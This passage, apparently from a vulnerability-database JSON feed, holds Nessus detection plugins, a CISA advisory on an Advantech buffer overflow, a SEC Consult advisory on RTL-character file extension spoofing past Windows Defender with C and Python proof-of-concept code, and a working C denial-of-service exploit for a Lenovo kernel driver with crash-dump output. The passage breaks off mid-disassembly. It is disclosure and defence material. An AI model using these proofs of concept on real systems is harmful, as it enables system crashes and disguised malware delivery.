reference:\"java-1_8_0-openjdk-demo-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-devel-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-devel-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-headless-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-headless-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_8_0-openjdk\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-13T06:36:49", "bulletinFamily": "scanner", "description": "The version of Adobe Photoshop CC installed on the remote Windows host is prior to 20.0.8 (2019.0.8), 21.0.2 (2020.0.2).\nIt is, therefore, affected by multiple unspecified memory corruption vulnerabilities exist. An attacker can exploit this\nto execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "ADOBE_PHOTOSHOP_APSB19-56.NASL", "href": "https://www.tenable.com/plugins/nessus/132022", "title": "Adobe Photoshop CC 20.x <= 20.0.7 / 21.x <= 21.0.1 Multiple Vulnerabilities (APSB19-56)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132022);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-8253\", \"CVE-2019-8254\");\n script_xref(name:\"IAVA\", value:\"2019-A-0297\");\n\n script_name(english:\"Adobe Photoshop CC 20.x <= 20.0.7 / 21.x <= 21.0.1 Multiple Vulnerabilities (APSB19-56)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Adobe Photoshop installed on remote Windows host is affected by a multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Photoshop CC installed on the remote Windows host is prior to 20.0.8 (2019.0.8), 21.0.2 (2020.0.2).\nIt is, therefore, affected by multiple unspecified memory corruption vulnerabilities exist. An attacker can exploit this\nto execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/photoshop/apsb19-56.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Photoshop CC version 20.0.8 (2019.0.8), 21.0.2 (2020.0.2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8253\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:photoshop_cc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_photoshop_installed.nasl\");\n script_require_keys(\"installed_sw/Adobe Photoshop\", \"SMB/Registry/Enumerated\");\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Adobe Photoshop', win_local:TRUE);\n\nif ('CC' >!< app_info.Product) vcf::vcf_exit(0, 'Only Adobe Photoshop CC is affected.');\n\nconstraints = [\n { 'min_version' : '20', 'max_version' : '20.0.7', 'fixed_version' : '20.0.8' },\n { 'min_version' : '21', 'max_version' : '21.0.1', 'fixed_version' : '21.0.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T08:09:41", "bulletinFamily": "scanner", "description": "The version of Thunderbird installed on the remote Windows host is prior to 68.3. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-38 advisory. Note that Nessus has not tested for this issue but has\ninstead relied only on the application", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "MOZILLA_THUNDERBIRD_68_3.NASL", "href": "https://www.tenable.com/plugins/nessus/131956", "title": "Mozilla Thunderbird < 68.3", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-38.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131956);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\n \"CVE-2019-11745\",\n \"CVE-2019-13722\",\n \"CVE-2019-17005\",\n \"CVE-2019-17008\",\n \"CVE-2019-17009\",\n \"CVE-2019-17010\",\n \"CVE-2019-17011\",\n \"CVE-2019-17012\"\n );\n script_xref(name:\"MFSA\", value:\"2019-38\");\n\n script_name(english:\"Mozilla Thunderbird < 68.3\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A mail client installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Windows host is prior to 68.3. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-38 advisory. Note that Nessus has not tested for this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-38/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 68.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17012\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude('mozilla_version.inc');\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'68.3', severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2019-12-12T20:20:49", "bulletinFamily": "info", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** DiagAnywhere Server\n * **Vulnerability: **Stack-based Buffer Overflow\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability may allow remote code execution.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of DiagAnywhere Server, used for remotely monitoring and controlling other Windows based devices, are affected:\n\n * DiagAnywhere Server Versions 3.07.11 and prior\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nMultiple stack-based buffer overflow vulnerabilities exist in the file transfer service listening on the TCP port. Successful exploitation could allow an unauthenticated attacker to execute arbitrary code with the privileges of the user running DiagAnywhere Server.\n\n[CVE-2019-18257](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18257>) has been assigned to these vulnerabilities. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** East Asia, United States, and Europe\n * **COMPANY HEADQUARTERS LOCATION: **Taiwan\n\n### 3.4 RESEARCHER\n\nZ0mb1E working with Trend Micro\u2019s Zero Day Initiative, reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\nAdvantech has phased out DiagAnywhere Server Version 3.07.11 and removed it from its website. \nAdvantech has released Version 3.07.14 of DiagAnywhere Server to address the reported vulnerability. Users can download the latest version of DiagAnywhere Server by accessing the Advantech Support Portal at [DiagAnywhere Server update](<https://gcc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.advantech.tw%2Fcontact%2Finquiryrequestform%3Fsubject%3Dtechnical%252bsupport&data=02%7C01%7Ckent.norris%40inl.gov%7C449fb83721f346b6eacb08d77e1527e4%7C4cf464b7869a42368da2a98566485554%7C0%7C1%7C637116501670835959&sdata=1Bu4oPEhrYMhfmHoWEBDuGvehe2PSWX%2Fc9DtL%2FVyS3E%3D&reserved=0>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://www.us-cert.gov/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "ICSA-19-346-01", "href": "https://www.us-cert.gov//ics/advisories/icsa-19-346-01", "title": "Advantech DiagAnywhere Server", "type": "ics", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-12-12T23:36:08", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "PACKETSTORM:155659", "href": "https://packetstormsecurity.com/files/155659/Windows-Defender-Antivirus-4.18.1908.7-0-File-Extension-Spoofing.html", "title": "Windows Defender Antivirus 4.18.1908.7-0 File Extension Spoofing", "type": "packetstorm", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20191211-0 > \n======================================================================= \ntitle: File Extension Spoofing \nproduct: Windows Defender Antivirus \nvulnerable version: 4.18.1908.7-0 \nfixed version: Virus Definition Update of 2019/09/30 \nCVE number: - \nimpact: High \nhomepage: https://www.microsoft.com/de-at/windows/comprehensive-security \nfound: 2019-09-25 \nby: David Haintz (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Keep your PC safe with trusted antivirus protection built-in to Windows 10. \nWindows Defender Antivirus delivers comprehensive, ongoing and real-time \nprotection against software threats like viruses, malware and spyware across \nemail, apps, the cloud and the web.\" \n \nSource: https://www.microsoft.com/de-at/windows/comprehensive-security \n \n \nBusiness recommendation: \n------------------------ \nUpdate to the latest version of the Windows Defender Antivirus definitions. \n \n \nVulnerability overview/description: \n----------------------------------- \nThe vulnerability is based on the file extension spoofing method using the RTL \nunicode character to display a spoofed file extension. This method uses the LTR \nunicode character, that instructs the following text to be shown in left-to-right \norder. Lets assume [LTR] is the LTR unicode character, an attacker can use this \nunicode character to fool a user into believing that a file has a different extension. \n \nFor example an attacker may name an executable file (.exe) 'spoofed-[LTR]gpj.exe', \nwhich would be displayed as 'spoofed-exe.jpg' on an LTR-based system. The most important \npoint here is to have the extension you want to be shown in reverse order, since it will \nbe shown right-to-left. \nCombined with the right file icon, an attacker can imitate an arbitrary file extension. \n \nSame goes for other extensions too, like 'xlsx' for a Microsoft Excel Sheet. During testing \nit happened that 'xlsx' was typed in the wrong order ('xslx' instead of 'xlsx' since reverse \norder) and Windows Defender Antivirus removed the test file while we tried to execute it. \nAs a result, two files were created, with the exact same executable but with different fake \nextensions: \n1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx') \n2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx') \n \nThe second one was deleted, while the first one could be executed without any problem. \n \nTherefore, other extensions related to Microsoft Office were tested as well, but it seems \nonly the xlsx extension had a detection for it. \n \n \nWhile the security issue of spoofing the file extension by using the RTL unicode character \n(on RTL systems it is the same just with LTR) is widely known, it seems to be unknown that \nMicrosoft already started to add detection mechanisms for this issue. But since it is not \nimplemented for all extensions and it seems to be implemented in the wrong order, this \nfeature is mostly unknown. \n \n \nProof of concept: \n----------------- \nFor the proof of concept a file has to be renamed in Unicode mode using the Unicode \ncharacter '202E' ('\\u202E' in C), which stands for RTL. The sample code is written in \nC/C++ and uses the unicode API of Windows. A Python PoC has been made as well. \n \nC/C++: \n \n#include <Windows.h> \n \nint main(int argc, char** argv) \n{ \nwchar_t opath[] = L\"test.exe\"; \nwchar_t npath_ok[] = L\"spoofed-\\u202Exslx.exe\"; // String for filename 'spoofed-exe.xlsx' \nwchar_t npath_wrong[] = L\"spoofed-\\u202Exlsx.exe\"; // String for filename 'spoofed-exe.xslx' \n \n// Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' \nCopyFileW(opath, npath_ok, false); \n// Copy 'test.exe' to file shown as 'spoofed-exe.xslx' \nCopyFileW(opath, npath_wrong, false); \n} \n \n \nPython: \n \nfrom shutil import copyfile \n \nopath = \"test.exe\" \nnpath_ok = \"spoofed-\\u202Exslx.exe\" # String for filename 'spoofed-exe.xlsx' \nnpath_wrong = \"spoofed-\\u202Exlsx.exe\" # String for filename 'spoofed-exe.xslx' \n \n# Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' \ncopyfile(opath, npath_ok) \n# Copy 'test.exe' to file shown as 'spoofed-exe.xslx' \ncopyfile(opath, npath_wrong) \n \n \nThere will be two new files after the execution (as long as 'test.exe' exists) and the file \nshown as 'spoofed-exe.xslx' will be deleted while trying to execute (or earlier) as shown \nin figure 1. \n \n[ win-defender-ext-spoofing1.png ] \nFigure 1: File gets deleted by Windows Defender Antivirus. \n \n \nBut the file shown as 'spoofed-exe.xlsx' will be executed without any problem. \n \n[ win-defender-ext-spoofing2.png ] \nFigure2: Test file is executed. \n \n \n \nVulnerable / tested versions: \n----------------------------- \nWindows Defender Antivirus has been tested in its latest version 4.18.1908.7-0, updated at 25th \nof September 2019. \n \n \nVendor contact timeline: \n------------------------ \n2019-09-26: Providing vendor the advisory through secure@microsoft.com \n2019-10-01: Microsoft answered that this is no vulnerability, but the virus definition \ndatabase will be updated \n2019-12-11: Public release of security advisory \n \n \nSolution: \n--------- \nThe update of the virus definition database of the 30th of September provides a fix. \n \n \nWorkaround: \n----------- \nThere is no workaround available. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF David Haintz / @2019 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155659/SA-20191211-0.txt"}], "zdt": [{"lastseen": "2019-12-12T14:52:22", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "1337DAY-ID-33654", "href": "https://0day.today/exploit/description/33654", "title": "Lenovo Power Management Driver 1.67.17.48 - (pmdrvs.sys) Denial of Service Exploit", "type": "zdt", "sourceData": "# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)\r\n# Exploit Author: Nassim Asrir\r\n# CVE: CVE-2019-6192\r\n# Tested On: Windows 10(64bit) | ThinkPad T470p\r\n# Vendor : https://www.lenovo.com/us/en/\r\n# Ref : https://support.lenovo.com/us/fr/solutions/len-29334\r\n\r\n# Description\r\n# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver\r\n# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes\r\n# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.\r\n\r\n# Exploit\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <conio.h>\r\n\r\nint main(int argc, char **argv)\r\n{\r\n HANDLE hDevice;\r\n DWORD bret;\r\n char szDevice[] = \"\\\\\\\\.\\\\pmdrvs\";\r\n\r\n printf(\"--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\\n\");\r\n\r\n printf(\"Opening handle to driver..\\n\");\r\n \r\n if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {\r\n printf(\"Device %s succesfully opened!\\n\", szDevice);\r\n printf(\"\\tHandle: %p\\n\", hDevice);\r\n }\r\n else\r\n {\r\n printf(\"Error: Error opening device %s\\n\", szDevice);\r\n }\r\n\r\n printf(\"\\nPress any key to DoS..\");\r\n _getch();\r\n\r\n bret = 0;\r\n \r\n if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))\r\n {\r\n printf(\"DeviceIoControl Error - bytes returned %#x\\n\", bret);\r\n }\r\n\r\n CloseHandle(hDevice);\r\n return 0;\r\n}\r\n\r\n\r\n# RCA\r\n\r\n2: kd> !analyze -v\r\n*******************************************************************************\r\n* *\r\n* Bugcheck Analysis *\r\n* *\r\n*******************************************************************************\r\n\r\nSYSTEM_SERVICE_EXCEPTION (3b)\r\nAn exception happened while executing a system service routine.\r\nArguments:\r\nArg1: 00000000c0000005, Exception code that caused the bugcheck\r\nArg2: fffff80428bf109d, Address of the instruction which caused the bugcheck\r\nArg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck\r\nArg4: 0000000000000000, zero.\r\n\r\nFAULTING_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nCONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\nResetting default scope\r\n\r\nCPU_COUNT: 8\r\n\r\nCPU_MHZ: af8\r\n\r\nCPU_VENDOR: GenuineIntel\r\n\r\nCPU_FAMILY: 6\r\n\r\nCPU_MODEL: 9e\r\n\r\nCPU_STEPPING: 9\r\n\r\nCPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)\r\n\r\nBLACKBOXBSD: 1 (!blackboxbsd)\r\n\r\n\r\nBLACKBOXPNP: 1 (!blackboxpnp)\r\n\r\n\r\nCURRENT_IRQL: 0\r\n\r\nANALYSIS_SESSION_HOST: LAPTOP-SP\r\n\r\nANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485\r\n\r\nANALYSIS_VERSION: 10.0.17763.132 amd64fre\r\n\r\nLAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d\r\n\r\nSTACK_TEXT: \r\nffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d\r\nffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060\r\nffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59\r\nffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071\r\nffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc\r\nffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56\r\nffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925\r\n00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844\r\n\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb\r\n\r\nTHREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b\r\n\r\nFOLLOWUP_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nFAULT_INSTR_CODE: 8941078b\r\n\r\nSYMBOL_STACK_INDEX: 0\r\n\r\nFOLLOWUP_NAME: MachineOwner\r\n\r\nSTACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb\r\n\r\nBUGCHECK_STR: 2E8B5A19\r\n\r\nEXCEPTION_CODE_STR: 2E8B5A19\r\n\r\nEXCEPTION_STR: WRONG_SYMBOLS\r\n\r\nPROCESS_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nIMAGE_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nMODULE_NAME: nt_wrong_symbols\r\n\r\nSYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000\r\n\r\nBUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nDEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nPRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS\r\n\r\nFAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000\r\n\r\nTARGET_TIME: 2019-09-30T19:27:36.000Z\r\n\r\nOSBUILD: 17763\r\n\r\nOSSERVICEPACK: 0\r\n\r\nSERVICEPACK_NUMBER: 0\r\n\r\nOS_REVISION: 0\r\n\r\nSUITE_MASK: 272\r\n\r\nPRODUCT_TYPE: 1\r\n\r\nOSPLATFORM_TYPE: x64\r\n\r\nOSNAME: Windows 10\r\n\r\nOSEDITION: Windows 10 WinNt TerminalServer SingleUserTS\r\n\r\nOS_LOCALE: \r\n\r\nUSER_LCID: 0\r\n\r\nOSBUILD_TIMESTAMP: 1994-09-30 01:21:45\r\n\r\nBUILDDATESTAMP_STR: 180914-1434\r\n\r\nBUILDLAB_STR: rs5_release\r\n\r\nBUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434\r\n\r\nANALYSIS_SESSION_ELAPSED_TIME: ae\r\n\r\nANALYSIS_SOURCE: KM\r\n\r\nFAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000\r\n\r\nFAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}\r\n\r\nFollowup: MachineOwner\r\n---------\r\n\r\n2: kd> u fffff804`28bf109d\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\nfffff804`28bf109f 41894308 mov dword ptr 